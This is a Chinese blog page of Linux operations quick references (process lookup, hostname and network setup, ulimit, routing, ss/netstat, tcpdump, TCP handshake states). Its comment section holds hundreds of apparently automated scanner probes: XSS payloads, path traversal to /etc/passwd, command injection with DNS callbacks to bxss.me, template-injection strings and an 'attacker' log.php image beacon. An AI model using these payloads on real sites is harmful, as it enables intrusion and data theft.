SweetEriri

运维速查

运维速查

根据进程名字查询pid并通过top显示
$ sudo pidof bioset | tr " " ',' | xargs top -bp

-b : Batch mode operation
   Starts  top  in  <A1><AF>Batch mode<A1><AF>, which could be useful for sending output from top to other programs or to a file.  In this mode, top will not accept input and runs until the iterations limit you<A1><AF>ve set with the <A1><AF>-n<A1><AF> command-line option or until killed.
$ sudo nmcli general hostname hollyshit
$ sudo hostnamectl set-hostname hollyshit
配置主机名
$ sudo nmcli general hostname sweeteriri
$ sudo hostnamectl set-hostname sweeteriri
配置 IP 地址
IPADDR=$IP
DNS=$DNS
GATEWAY=$GATEWAY
NETMASK=255.255.255.0
ZONE=public
ONBOOT=yes
$ sudo systemctl restart network
查看当前最大并发数的配置
$ ulimit -n
配置主机名
修改 /etc/security/limits.conf
* soft nofile 10240
* hard nofile 10240
neo hard nofile 10240

第一列可以指定用户或组,也可使用 *% 通配符。指定组时,组名前面加 @,如 @admin。修改后需 重启 系统才能生效。

* 代表作用于所有用户,第三行的 neo 是指定用户名。

hard 限定的值只能由管理员配置,对于用户来说,该值是上限,不可逾越。

soft 所限定的值用户自己可以用 ulimit -S -n 1024 调整,但不可超过 hard 值。

nofile :Number of Open file descriptors,即文件描述符总数的上限。

添加主机路由
$ route add -host $IP dev etho
添加默认网关
$ route add default gw 192.168.197.1
添加网络路由
$ route add -net 192.168.1.0 netmask 255.255.255.0 dev eth1
$ route add -net 192.168.1.0 netmask 255.255.255.0 gw $IP
SS与NETSTATS
$ ss -a 查看机器的socket连接数
$ ss -l 查看机器的端口情况
$ ss -s 查看机器的网络连接数
$ netstat -n | awk '/^tcp/{a[$NF]++} END{for(i in a){print i,a[i]}}' #查看 http 并发请求数以及 TCP 连接状态

如果只想查看TCP sockets,那么使用-ta选项; 如果只想查看UDP sockets,那么使用-ua选项; 如果只想查看RAW sockets,那么使用-wa选项; 如果只想查看UNIX sockets,那么使用-xa选项。

CLOSED 初始(无连接)状态。 LISTEN 侦听状态,等待远程机器的连接请求。 SYN_SEND 在TCP三次握手期间,主动连接端发送了SYN包后,进入SYN_SEND状态,等待对方的ACK包。 SYN_RECV 在TCP三次握手期间,主动连接端收到SYN包后,进入SYN_RECV状态。 ESTABLISHED 完成TCP三次握手后,主动连接端进入ESTABLISHED状态。此时,TCP连接已经建立,可以进行通信。 FIN_WAIT_1 在TCP四次挥手时,主动关闭端发送FIN包后,进入FIN_WAIT_1状态。 FIN_WAIT_2 在TCP四次挥手时,主动关闭端收到ACK包后,进入FIN_WAIT_2状态。 TIME_WAIT 在TCP四次挥手时,主动关闭端发送了ACK包之后,进入TIME_WAIT状态,等待最多MSL时间,让被动关闭端收到ACK包。 CLOSING 在TCP四次挥手期间,主动关闭端发送了FIN包后,没有收到对应的ACK包,却收到对方的FIN包,此时,进入CLOSING状态。 CLOSE_WAIT 在TCP四次挥手期间,被动关闭端收到FIN包后,进入CLOSE_WAIT状态。 LAST_ACK 在TCP四次挥手时,被动关闭端发送FIN包后,进入LAST_ACK状态,等待对方的ACK包。

主动连接端可能的状态有: CLOSED SYN_SEND ESTABLISHED 主动关闭端可能的状态有: FIN_WAIT_1 FIN_WAIT_2 TIME_WAIT 被动连接端可能的状态有: LISTEN SYN_RECV ESTABLISHED 被动关闭端可能的状态有: CLOSE_WAIT LAST_ACK CLOSED

在Linux下,如果连接数比较大,可以使用效率更高的ss来替代netstat。 查看tomcat的并发数:netstat` `-an|grep10050|`awk `'{count[$6]++} END{for (i in count) print(i,count[i])}'

查看哪个地址对 80 端口的访问次数最多
tcpdump 嗅探 80 端口的访问,看谁最高。
$ sudo tcpdump -i venet0 -tnn dst port 80 -c 1000 \
| awk '/^IP/{print $2}' \
| awk -F. '{print $1 "." $2 "." $3 "." $4}' \
| uniq -c \
| sort -rn
使用 tcpdump 监听 “目标主机为 192.168.1.1,目标端口为 tcp/80” 的数据,同时将输出结果保存到 tcpdump.log
$ sudo tcpdump -i ens33 'host 192.168.1.1 and port 80' > tcpdump.log
用 tcpdump 嗅探对本地 80 端口的访问流量,列出访问量最大的 IP 地址
$ sudo tcpdump -i ens33 -tnn dst port 80 -c 1000 \
| awk '/^IP/{print $2}' \
| awk -F. '{print $1 "." $2 "." $3 "." $4}' \
| uniq -c | sort -rn

-i :指定监听的网卡

-t :不显示每行的时间戳

-n :不转换地址,如把 IP 地址转换为主机名,把端口号转换为服务名

-nn :不转换协议和端口号,不把地址转换为主机名

-c :count,抓包数量

用脚本 ping 多个 IP 地址
连续 IP 地址
#!/bin/bash
for ip in `seq 1 255`
do
  ping -c 1 192.168.1.$ip > /dev/null 2>&1
  if [ $? -eq 0]; then
    echo 192.168.1.$ip is ONLINE
  else
    echo 192.168.1.$ip is OFFLINE
  fi
done
wait
不连续 IP 地址

将IP地址写入list.txt

#!/bin/bash
cat /path/to/list.txt | while read output
do
  ping -c 1 "$output" > /dev/null
  if [ $? -eq 0 ]; then
    echo "node $output is up"
  else
    echo "node $output is down"
  fi
done
三次握手与四次挥手

所谓三次握手(Three-way Handshake),是指建立一个 TCP 连接时,需要客户端和服务器总共发送3个包。

三次握手的目的是连接服务器指定端口,建立 TCP 连接,并同步连接双方的序列号和确认号,交换 TCP 窗口大小信息。在 socket 编程中,客户端执行 connect() 时。将触发三次握手。

  • 第一次握手(SYN=1, seq=x):

客户端发送一个 TCP 的 SYN 标志位置1的包,指明客户端打算连接的服务器的端口,以及初始序号 X,保存在包头的序列号(Sequence Number)字段里。

发送完毕后,客户端进入 SYN_SEND 状态。

  • 第二次握手(SYN=1, ACK=1, seq=y, ACKnum=x+1):

服务器发回确认包(ACK)应答。即 SYN 标志位和 ACK 标志位均为1。服务器端选择自己 ISN 序列号,放到 Seq 域里,同时将确认序号(Acknowledgement Number)设置为客户的 ISN 加1,即X+1。 发送完毕后,服务器端进入 SYN_RCVD 状态。

  • 第三次握手(ACK=1,ACKnum=y+1)

客户端再次发送确认包(ACK),SYN 标志位为0,ACK 标志位为1,并且把服务器发来 ACK 的序号字段+1,放在确定字段中发送给对方,并且在数据段放写ISN的+1

发送完毕后,客户端进入 ESTABLISHED 状态,当服务器端接收到这个包时,也进入 ESTABLISHED 状态,TCP 握手结束。

三次握手的过程的示意图如下:

three-way-handshake

TCP 的连接的拆除需要发送四个包,因此称为四次挥手(Four-way handshake),也叫做改进的三次握手。客户端或服务器均可主动发起挥手动作,在 socket 编程中,任何一方执行 close() 操作即可产生挥手操作。

  • 第一次挥手(FIN=1,seq=x)

假设客户端想要关闭连接,客户端发送一个 FIN 标志位置为1的包,表示自己已经没有数据可以发送了,但是仍然可以接受数据。

发送完毕后,客户端进入 FIN_WAIT_1 状态。

  • 第二次挥手(ACK=1,ACKnum=x+1)

服务器端确认客户端的 FIN 包,发送一个确认包,表明自己接受到了客户端关闭连接的请求,但还没有准备好关闭连接。

发送完毕后,服务器端进入 CLOSE_WAIT 状态,客户端接收到这个确认包之后,进入 FIN_WAIT_2 状态,等待服务器端关闭连接。

  • 第三次挥手(FIN=1,seq=y)

服务器端准备好关闭连接时,向客户端发送结束连接请求,FIN 置为1。

发送完毕后,服务器端进入 LAST_ACK 状态,等待来自客户端的最后一个ACK。

  • 第四次挥手(ACK=1,ACKnum=y+1)

客户端接收到来自服务器端的关闭请求,发送一个确认包,并进入 TIME_WAIT状态,等待可能出现的要求重传的 ACK 包。

服务器端接收到这个确认包之后,关闭连接,进入 CLOSED 状态。

客户端等待了某个固定时间(两个最大段生命周期,2MSL,2 Maximum Segment Lifetime)之后,没有收到服务器端的 ACK ,认为服务器端已经正常关闭连接,于是自己也关闭连接,进入 CLOSED 状态。

四次挥手的示意图如下:

img


发表评论

评论列表,共 371 条评论

  • SweetEriri
    Dcoker测试
  • 1
    test
  • lxbfYeaa
    &n948685=v965069
  • lxbfYeaa
    response.write(9892121*9151841)
  • lxbfYeaa
    '+response.write(9892121*9151841)+'
  • lxbfYeaa
    "+"A".concat(70-3).concat(22*4).concat(102).concat(67).concat(106).concat(90)+(require"socket" Socket.gethostbyname("hitwm"+"znttcspv338b5.bxss.me.")[3].to_s)+"
  • lxbfYeaa
    "+response.write(9892121*9151841)+"
  • lxbfYeaa
    '+'A'.concat(70-3).concat(22*4).concat(108).concat(68).concat(111).concat(88)+(require'socket' Socket.gethostbyname('hitqt'+'ktrsinhedce01.bxss.me.')[3].to_s)+'
  • lxbfYeaa
    ../../../../../../../../../../etc/passwd
  • lxbfYeaa
    ../../../../../../../../../../windows/win.ini
  • lxbfYeaa
    ../
  • lxbfYeaa
    ./
  • lxbfYeaa
    12345'"\'\")
  • lxbfYeaa
    <esi:include src="http://bxss.me/rpb.png"/>
  • lxbfYeaa
    8NgpUjs3
  • lxbfYeaa
    HttP://bxss.me/t/xss.html?%00
  • lxbfYeaa
    bxss.me/t/xss.html?%00
  • lxbfYeaa
    index.php
  • lxbfYeaa
    ${9999467+9999426}
  • lxbfYeaa
    index.php/.
  • lxbfYeaa
    echo wvfhyi$()\ xkjgbx\nz^xyu||a #' &echo wvfhyi$()\ xkjgbx\nz^xyu||a #|" &echo wvfhyi$()\ xkjgbx\nz^xyu||a #
  • lxbfYeaa
    '.gethostbyname(lc('hitnh'.'oaoxbyogd4a0f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(74).chr(103).chr(84).'
  • lxbfYeaa
    &echo rlwtbx$()\ pgckel\nz^xyu||a #' &echo rlwtbx$()\ pgckel\nz^xyu||a #|" &echo rlwtbx$()\ pgckel\nz^xyu||a #
  • lxbfYeaa
    ".gethostbyname(lc("hitpo"."fcvjpjhb36c8e.bxss.me."))."A".chr(67).chr(hex("58")).chr(112).chr(83).chr(97).chr(77)."
  • lxbfYeaa
    |echo vivldd$()\ pviept\nz^xyu||a #' |echo vivldd$()\ pviept\nz^xyu||a #|" |echo vivldd$()\ pviept\nz^xyu||a #
  • lxbfYeaa
    '"()
  • lxbfYeaa
    ctime sleep p0 (I30 tp1 Rp2 .
  • lxbfYeaa
    (nslookup hithawplqfrbtb43d2.bxss.me||perl -e "gethostbyname('hithawplqfrbtb43d2.bxss.me')")
  • lxbfYeaa
    )
  • lxbfYeaa
    !(()&&!|*|*|
  • lxbfYeaa
    $(nslookup hitvjscjjbybv34c17.bxss.me||perl -e "gethostbyname('hitvjscjjbybv34c17.bxss.me')")
  • lxbfYeaa
    ^(#$!@#$)(()))******
  • lxbfYeaa
    &(nslookup hitkuqeynvgshab036.bxss.me||perl -e "gethostbyname('hitkuqeynvgshab036.bxss.me')")&'\"`0&(nslookup hitkuqeynvgshab036.bxss.me||perl -e "gethostbyname('hitkuqeynvgshab036.bxss.me')")&`'
  • lxbfYeaa
    |(nslookup hitwwkikwzepfa206f.bxss.me||perl -e "gethostbyname('hitwwkikwzepfa206f.bxss.me')")
  • lxbfYeaa
    `(nslookup hitsnnpebuxoif5c12.bxss.me||perl -e "gethostbyname('hitsnnpebuxoif5c12.bxss.me')")`
  • lxbfYeaa
    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • lxbfYeaa
    1P2bIcqnO
  • lxbfYeaa
    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  • lxbfYeaa
    '"
  • lxbfYeaa
    <!--
  • lxbfYeaa
    Http://bxss.me/t/fit.txt
  • lxbfYeaa
    http://bxss.me/t/fit.txt?.jpg
  • lxbfYeaa
    bxss.me
  • lxbfYeaa
    /xfs.bxss.me
  • lxbfYeaa
    '
  • lxbfYeaa
    "
  • lxbfYeaa
    ${@print(md5(31337))}
  • lxbfYeaa
    ${@print(md5(31337))}\
  • lxbfYeaa
    '.print(md5(31337)).'
  • lxbfYeaa
    '"()&%<acx><ScRiPt >AlgB(9575)</ScRiPt>
  • lxbfYeaa
    '"()&%<acx><ScRiPt >AlgB(9272)</ScRiPt>
  • lxbfYeaa
    9141050
  • lxbfYeaa
    acu3108<s1﹥s2ʺs3ʹuca3108
  • lxbfYeaa
    acux1838��z1��z2a�bcxuca1838
  • lxbfYeaa
    {{50220*50128}}
  • lxbfYeaa
    @{49615*49890}
  • lxbfYeaa
    <ScRiPt >AlgB(9210)</ScRiPt>
  • lxbfYeaa
    <WBKDVM>PTKMU[!+!]</WBKDVM>
  • lxbfYeaa
    <script>AlgB(9843)</script>
  • lxbfYeaa
    <ScR<ScRiPt>IpT>AlgB(9970)</sCr<ScRiPt>IpT>
  • lxbfYeaa
    <ScRiPt >AlgB(9331)</ScRiPt>
  • lxbfYeaa
    <ScRiPt/acu src=//xss.bxss.me/t/xss.js?9507></ScRiPt>
  • lxbfYeaa
    <video><source onerror="javascript:AlgB(9619)">
  • lxbfYeaa
    <isindex type=image src=1 onerror=AlgB(9599)>
  • lxbfYeaa
    <iframe src='data:text/html
  • lxbfYeaa
    <body onload=AlgB(9867)>
  • lxbfYeaa
    <img src=//xss.bxss.me/t/dot.gif onload=AlgB(9261)>
  • lxbfYeaa
    <img src=xyz OnErRor=AlgB(9536)>
  • lxbfYeaa
    <img/src=">" onerror=alert(9302)>
  • lxbfYeaa
    %0A%3C%53%63%52%69%50%74%20%3E%41%6C%67%42%289900%29%3C%2F%73%43%72%69%70%54%3E
  • lxbfYeaa
    \u003CScRiPt\AlgB(9043)\u003C/sCripT\u003E
  • lxbfYeaa
    &lt
  • lxbfYeaa
    �<img acu onmouseover=AlgB(95081) //�>
  • lxbfYeaa
    <input autofocus onfocus=AlgB(9806)>
  • lxbfYeaa
    <a HrEF=http://xss.bxss.me></a>
  • lxbfYeaa
    <a HrEF=jaVaScRiPT:>
  • lxbfYeaa
    [url=http://xss.bxss.me][/url]
  • lxbfYeaa
    <img<!-- --> src=x onerror=alert(9869)
  • lxbfYeaa
    &n989719=v971151
  • lxbfYeaa
    }body{acu:Expre/**/SSion(AlgB(9889))}
  • lxbfYeaa
    <% contenteditable onresize=AlgB(9173)>
  • lxbfYeaa
    "+"A".concat(70-3).concat(22*4).concat(112).concat(71).concat(116).concat(76)+(require"socket" Socket.gethostbyname("hitwf"+"kysitqkadb607.bxss.me.")[3].to_s)+"
  • lxbfYeaa
    '+'A'.concat(70-3).concat(22*4).concat(98).concat(72).concat(100).concat(71)+(require'socket' Socket.gethostbyname('hitzt'+'kvysepzmac990.bxss.me.')[3].to_s)+'
  • lxbfYeaa
    jCrow <ScRiPt >AlgB(9028)</ScRiPt>
  • lxbfYeaa
    response.write(9812323*9102245)
  • lxbfYeaa
    <WTZLWA>SNQHI[!+!]</WTZLWA>
  • lxbfYeaa
    '+response.write(9812323*9102245)+'
  • lxbfYeaa
    "+response.write(9812323*9102245)+"
  • lxbfYeaa
    <ifRAme sRc=9171.com></IfRamE>
  • lxbfYeaa
    XAe03SfP
  • lxbfYeaa
    <JuPOaZ x=9041>
  • lxbfYeaa
    index.php
  • lxbfYeaa
    <esi:include src="http://bxss.me/rpb.png"/>
  • lxbfYeaa
    ${9999949+10000119}
  • lxbfYeaa
    <img sRc='http://attacker-9492/log.php?
  • lxbfYeaa
    ../../../../../../../../../../etc/passwd
  • lxbfYeaa
    ../../../../../../../../../../windows/win.ini
  • lxbfYeaa
    index.php/.
  • lxbfYeaa
    HttP://bxss.me/t/xss.html?%00
  • lxbfYeaa
    <IYLZ4B<
  • lxbfYeaa
    bxss.me/t/xss.html?%00
  • lxbfYeaa
    ../
  • lxbfYeaa
    ctime sleep p0 (I30 tp1 Rp2 .
  • lxbfYeaa
    12345'"\'\")
  • lxbfYeaa
    ./
  • lxbfYeaa
    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • lxbfYeaa
    '.gethostbyname(lc('hitdg'.'mjmdfuhyfc534.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(69).chr(104).chr(85).'
  • lxbfYeaa
    ".gethostbyname(lc("hitsc"."qmncnvhh46de3.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(90).chr(101).chr(78)."
  • lxbfYeaa
    '"()
  • lxbfYeaa
    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  • lxbfYeaa
    '"
  • lxbfYeaa
    <!--
  • lxbfYeaa
    )
  • lxbfYeaa
    Http://bxss.me/t/fit.txt
  • lxbfYeaa
    !(()&&!|*|*|
  • lxbfYeaa
    http://bxss.me/t/fit.txt?.jpg
  • lxbfYeaa
    ^(#$!@#$)(()))******
  • lxbfYeaa
    bxss.me
  • lxbfYeaa
    '
  • lxbfYeaa
    "
  • lxbfYeaa
    /xfs.bxss.me
  • lxbfYeaa
    ${@print(md5(31337))}
  • lxbfYeaa
    ${@print(md5(31337))}\
  • lxbfYeaa
    '.print(md5(31337)).'
  • lxbfYeaa
    echo vgmczg$()\ lxhccd\nz^xyu||a #' &echo vgmczg$()\ lxhccd\nz^xyu||a #|" &echo vgmczg$()\ lxhccd\nz^xyu||a #
  • lxbfYeaa
    &echo izxmiq$()\ sdkgew\nz^xyu||a #' &echo izxmiq$()\ sdkgew\nz^xyu||a #|" &echo izxmiq$()\ sdkgew\nz^xyu||a #
  • lxbfYeaa
    |echo spxrki$()\ eugodt\nz^xyu||a #' |echo spxrki$()\ eugodt\nz^xyu||a #|" |echo spxrki$()\ eugodt\nz^xyu||a #
  • lxbfYeaa
    (nslookup hitzenkcoaesp7f824.bxss.me||perl -e "gethostbyname('hitzenkcoaesp7f824.bxss.me')")
  • lxbfYeaa
    $(nslookup hitesnjnhrnar28e9c.bxss.me||perl -e "gethostbyname('hitesnjnhrnar28e9c.bxss.me')")
  • lxbfYeaa
    &(nslookup hitzfqyfcffvq5d6ea.bxss.me||perl -e "gethostbyname('hitzfqyfcffvq5d6ea.bxss.me')")&'\"`0&(nslookup hitzfqyfcffvq5d6ea.bxss.me||perl -e "gethostbyname('hitzfqyfcffvq5d6ea.bxss.me')")&`'
  • lxbfYeaa
    |(nslookup hitbhoxwopaqt58a80.bxss.me||perl -e "gethostbyname('hitbhoxwopaqt58a80.bxss.me')")
  • lxbfYeaa
    `(nslookup hitconmwvmlws9de2c.bxss.me||perl -e "gethostbyname('hitconmwvmlws9de2c.bxss.me')")`
  • lxbfYeaa
    '"()&%<acx><ScRiPt >RBlI(9743)</ScRiPt>
  • lxbfYeaa
    '"()&%<acx><ScRiPt >RBlI(9640)</ScRiPt>
  • lxbfYeaa
    9736104
  • lxbfYeaa
    acu9698<s1﹥s2ʺs3ʹuca9698
  • lxbfYeaa
    acux8583��z1��z2a�bcxuca8583
  • lxbfYeaa
    {{49050*49788}}
  • lxbfYeaa
    @{49565*50376}
  • lxbfYeaa
    <ScRiPt >RBlI(9937)</ScRiPt>
  • lxbfYeaa
    <WWJYAI>4J6MZ[!+!]</WWJYAI>
  • lxbfYeaa
    <script>RBlI(9141)</script>
  • lxbfYeaa
    &n976663=v995402
  • lxbfYeaa
    <ScR<ScRiPt>IpT>RBlI(9222)</sCr<ScRiPt>IpT>
  • lxbfYeaa
    <ScRiPt >RBlI(9536)</ScRiPt>
  • lxbfYeaa
    <ScRiPt/acu src=//xss.bxss.me/t/xss.js?9819></ScRiPt>
  • lxbfYeaa
    "+"A".concat(70-3).concat(22*4).concat(105).concat(81).concat(115).concat(78)+(require"socket" Socket.gethostbyname("hitoi"+"dphcyoku1ef07.bxss.me.")[3].to_s)+"
  • lxbfYeaa
    '+'A'.concat(70-3).concat(22*4).concat(116).concat(89).concat(113).concat(65)+(require'socket' Socket.gethostbyname('hityu'+'tilhausp7b931.bxss.me.')[3].to_s)+'
  • lxbfYeaa
    <video><source onerror="javascript:RBlI(9277)">
  • lxbfYeaa
    <isindex type=image src=1 onerror=RBlI(9186)>
  • lxbfYeaa
    response.write(9734730*9380132)
  • lxbfYeaa
    '+response.write(9734730*9380132)+'
  • lxbfYeaa
    "+response.write(9734730*9380132)+"
  • lxbfYeaa
    12345'"\'\")
  • lxbfYeaa
    index.php
  • lxbfYeaa
    <iframe src='data:text/html
  • lxbfYeaa
    UZm5Sogn
  • lxbfYeaa
    index.php/.
  • lxbfYeaa
    <body onload=RBlI(9915)>
  • lxbfYeaa
    ../../../../../../../../../../etc/passwd
  • lxbfYeaa
    ../../../../../../../../../../windows/win.ini
  • lxbfYeaa
    <img src=//xss.bxss.me/t/dot.gif onload=RBlI(9384)>
  • lxbfYeaa
    <esi:include src="http://bxss.me/rpb.png"/>
  • lxbfYeaa
    ../
  • lxbfYeaa
    <img src=xyz OnErRor=RBlI(9032)>
  • lxbfYeaa
    ./
  • lxbfYeaa
    ${10000143+9999413}
  • lxbfYeaa
    <img/src=">" onerror=alert(9273)>
  • lxbfYeaa
    HttP://bxss.me/t/xss.html?%00
  • lxbfYeaa
    %0A%3C%53%63%52%69%50%74%20%3E%52%42%6C%49%289289%29%3C%2F%73%43%72%69%70%54%3E
  • lxbfYeaa
    bxss.me/t/xss.html?%00
  • lxbfYeaa
    \u003CScRiPt\RBlI(9248)\u003C/sCripT\u003E
  • lxbfYeaa
    &lt
  • lxbfYeaa
    '"()
  • lxbfYeaa
    ctime sleep p0 (I30 tp1 Rp2 .
  • lxbfYeaa
    �<img acu onmouseover=RBlI(94001) //�>
  • lxbfYeaa
    <input autofocus onfocus=RBlI(9800)>
  • lxbfYeaa
    )
  • lxbfYeaa
    !(()&&!|*|*|
  • lxbfYeaa
    '.gethostbyname(lc('hitnd'.'yudskqfo95848.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(80).chr(119).chr(73).'
  • lxbfYeaa
    <a HrEF=http://xss.bxss.me></a>
  • lxbfYeaa
    ^(#$!@#$)(()))******
  • lxbfYeaa
    ".gethostbyname(lc("hitra"."yhdeuikf9a9f7.bxss.me."))."A".chr(67).chr(hex("58")).chr(116).chr(66).chr(98).chr(88)."
  • lxbfYeaa
    http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
  • lxbfYeaa
    <a HrEF=jaVaScRiPT:>
  • lxbfYeaa
    [url=http://xss.bxss.me][/url]
  • lxbfYeaa
    Http://bxss.me/t/fit.txt
  • lxbfYeaa
    '"()&%<acx><ScRiPt >DKcu(9997)</ScRiPt>
  • lxbfYeaa
    )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  • lxbfYeaa
    http://bxss.me/t/fit.txt?.jpg
  • lxbfYeaa
    bxss.me
  • lxbfYeaa
    <img<!-- --> src=x onerror=alert(9983)
  • lxbfYeaa
    '"()&%<acx><ScRiPt >DKcu(9113)</ScRiPt>
  • lxbfYeaa
    }body{acu:Expre/**/SSion(RBlI(9923))}
  • lxbfYeaa
    '"
  • lxbfYeaa
    echo osxkxn$()\ fleidd\nz^xyu||a #' &echo osxkxn$()\ fleidd\nz^xyu||a #|" &echo osxkxn$()\ fleidd\nz^xyu||a #
  • lxbfYeaa
    <!--
  • lxbfYeaa
    &echo rrvaww$()\ wrnhie\nz^xyu||a #' &echo rrvaww$()\ wrnhie\nz^xyu||a #|" &echo rrvaww$()\ wrnhie\nz^xyu||a #
  • lxbfYeaa
    9343451
  • lxbfYeaa
    '
  • lxbfYeaa
    |echo tfmnhb$()\ jxlixm\nz^xyu||a #' |echo tfmnhb$()\ jxlixm\nz^xyu||a #|" |echo tfmnhb$()\ jxlixm\nz^xyu||a #
  • lxbfYeaa
    <% contenteditable onresize=RBlI(9457)>
  • lxbfYeaa
    "
  • lxbfYeaa
    (nslookup hitoiohtpsptsc7fe2.bxss.me||perl -e "gethostbyname('hitoiohtpsptsc7fe2.bxss.me')")
  • lxbfYeaa
    ${@print(md5(31337))}
  • lxbfYeaa
    /xfs.bxss.me
  • lxbfYeaa
    ZAOjc <ScRiPt >RBlI(9748)</ScRiPt>
  • lxbfYeaa
    ${@print(md5(31337))}\
  • lxbfYeaa
    $(nslookup hitjspxkbuqwh5c5a2.bxss.me||perl -e "gethostbyname('hitjspxkbuqwh5c5a2.bxss.me')")
  • lxbfYeaa
    '.print(md5(31337)).'
  • lxbfYeaa
    acu6118<s1﹥s2ʺs3ʹuca6118
  • lxbfYeaa
    &(nslookup hittlfkozhkghcad0e.bxss.me||perl -e "gethostbyname('hittlfkozhkghcad0e.bxss.me')")&'\"`0&(nslookup hittlfkozhkghcad0e.bxss.me||perl -e "gethostbyname('hittlfkozhkghcad0e.bxss.me')")&`'
  • lxbfYeaa
    |(nslookup hitcbiyjotxyt20f83.bxss.me||perl -e "gethostbyname('hitcbiyjotxyt20f83.bxss.me')")
  • lxbfYeaa
    <WO5YQX>8R2YF[!+!]</WO5YQX>
  • lxbfYeaa
    `(nslookup hitmxsftccpobc3c96.bxss.me||perl -e "gethostbyname('hitmxsftccpobc3c96.bxss.me')")`
  • lxbfYeaa
    acux8666��z1��z2a�bcxuca8666
  • lxbfYeaa
    <ifRAme sRc=9538.com></IfRamE>
  • lxbfYeaa
    <JyeUJY x=9114>
  • lxbfYeaa
    {{49238*49577}}
  • lxbfYeaa
    <img sRc='http://attacker-9984/log.php?
  • lxbfYeaa
    <pZw0OV<
  • lxbfYeaa
    @{49466*50068}
  • lxbfYeaa
    <ScRiPt >DKcu(9983)</ScRiPt>
  • lxbfYeaa
    <W1WT8I>23ZOM[!+!]</W1WT8I>
  • lxbfYeaa
    <script>DKcu(9270)</script>
  • lxbfYeaa
    <ScR<ScRiPt>IpT>DKcu(9289)</sCr<ScRiPt>IpT>
  • lxbfYeaa
    <ScRiPt >DKcu(9253)</ScRiPt>
  • lxbfYeaa
    <ScRiPt/acu src=//xss.bxss.me/t/xss.js?9651></ScRiPt>
  • lxbfYeaa
    <video><source onerror="javascript:DKcu(9738)">
  • lxbfYeaa
    '"()&%<acx><ScRiPt >2kwb(9269)</ScRiPt>
  • lxbfYeaa
    '"()&%<acx><ScRiPt >2kwb(9719)</ScRiPt>
  • lxbfYeaa
    9280869
  • lxbfYeaa
    acu4395<s1﹥s2ʺs3ʹuca4395
  • lxbfYeaa
    <isindex type=image src=1 onerror=DKcu(9066)>
  • lxbfYeaa
    acux8201��z1��z2a�bcxuca8201
  • lxbfYeaa
    {{49027*50041}}
  • lxbfYeaa
    <iframe src='data:text/html
  • lxbfYeaa
    @{50449*49533}
  • lxbfYeaa
    <ScRiPt >2kwb(9339)</ScRiPt>
  • lxbfYeaa
    <body onload=DKcu(9845)>
  • lxbfYeaa
    <WL933T>OKWW0[!+!]</WL933T>
  • lxbfYeaa
    <script>2kwb(9634)</script>
  • lxbfYeaa
    <img src=//xss.bxss.me/t/dot.gif onload=DKcu(9635)>
  • lxbfYeaa
    <ScR<ScRiPt>IpT>2kwb(9569)</sCr<ScRiPt>IpT>
  • lxbfYeaa
    <ScRiPt >2kwb(9589)</ScRiPt>
  • lxbfYeaa
    <img src=xyz OnErRor=DKcu(9674)>
  • lxbfYeaa
    <ScRiPt/acu src=//xss.bxss.me/t/xss.js?9355></ScRiPt>
  • lxbfYeaa
    <img/src=">" onerror=alert(9579)>
  • lxbfYeaa
    <video><source onerror="javascript:2kwb(9683)">
  • lxbfYeaa
    %0A%3C%53%63%52%69%50%74%20%3E%44%4B%63%75%289168%29%3C%2F%73%43%72%69%70%54%3E
  • lxbfYeaa
    <isindex type=image src=1 onerror=2kwb(9893)>
  • lxbfYeaa
    \u003CScRiPt\DKcu(9713)\u003C/sCripT\u003E
  • lxbfYeaa
    <iframe src='data:text/html
  • lxbfYeaa
    <body onload=2kwb(9514)>
  • lxbfYeaa
    &lt
  • lxbfYeaa
    <img src=//xss.bxss.me/t/dot.gif onload=2kwb(9424)>
  • lxbfYeaa
    <img src=xyz OnErRor=2kwb(9780)>
  • lxbfYeaa
    �<img acu onmouseover=DKcu(91431) //�>
  • lxbfYeaa
    <img/src=">" onerror=alert(9404)>
  • lxbfYeaa
    %0A%0A%3C%53%63%52%69%50%74%20%3E%32%6B%77%62%289739%29%3C%2F%73%43%72%69%70%54%3E
  • lxbfYeaa
    <input autofocus onfocus=DKcu(9144)>
  • lxbfYeaa
    \u003CScRiPt\2kwb(9087)\u003C/sCripT\u003E
  • lxbfYeaa
    &lt
  • lxbfYeaa
    <a HrEF=http://xss.bxss.me></a>
  • lxbfYeaa
    �<img acu onmouseover=2kwb(91621) //�>
  • lxbfYeaa
    <a HrEF=jaVaScRiPT:>
  • lxbfYeaa
    <input autofocus onfocus=2kwb(9281)>
  • lxbfYeaa
    <a HrEF=http://xss.bxss.me></a>
  • lxbfYeaa
    [url=http://xss.bxss.me][/url]
  • lxbfYeaa
    <a HrEF=jaVaScRiPT:>
  • lxbfYeaa
    [url=http://xss.bxss.me][/url]
  • lxbfYeaa
    <img<!-- --> src=x onerror=alert(9219)
  • lxbfYeaa
    <img<!-- --> src=x onerror=alert(9395)
  • lxbfYeaa
    }body{acu:Expre/**/SSion(DKcu(9674))}
  • lxbfYeaa
    }body{acu:Expre/**/SSion(2kwb(9178))}
  • lxbfYeaa
    <% contenteditable onresize=2kwb(9621)>
  • lxbfYeaa
    <% contenteditable onresize=DKcu(9186)>
  • lxbfYeaa
    CkopN <ScRiPt >2kwb(9935)</ScRiPt>
  • lxbfYeaa
    <WVRHTY>0TO0E[!+!]</WVRHTY>
  • lxbfYeaa
    CZIAH <ScRiPt >DKcu(9142)</ScRiPt>
  • lxbfYeaa
    <ifRAme sRc=9082.com></IfRamE>
  • lxbfYeaa
    <0KBz1F x=9599>
  • lxbfYeaa
    <WCVYXJ>M7AMY[!+!]</WCVYXJ>
  • lxbfYeaa
    <img sRc='http://attacker-9228/log.php?
  • lxbfYeaa
    <StdoPF<
  • lxbfYeaa
    <ifRAme sRc=9119.com></IfRamE>
  • lxbfYeaa
    <g2vOQW x=9693>
  • lxbfYeaa
    <img sRc='http://attacker-9349/log.php?
  • lxbfYeaa
    <wTmwkR<
  • lxbfYeaa
    NQneKSSC
  • lxbfYeaa
    1*
  • lxbfYeaa
    1*
  • lxbfYeaa
    1*
  • lxbfYeaa
    1*
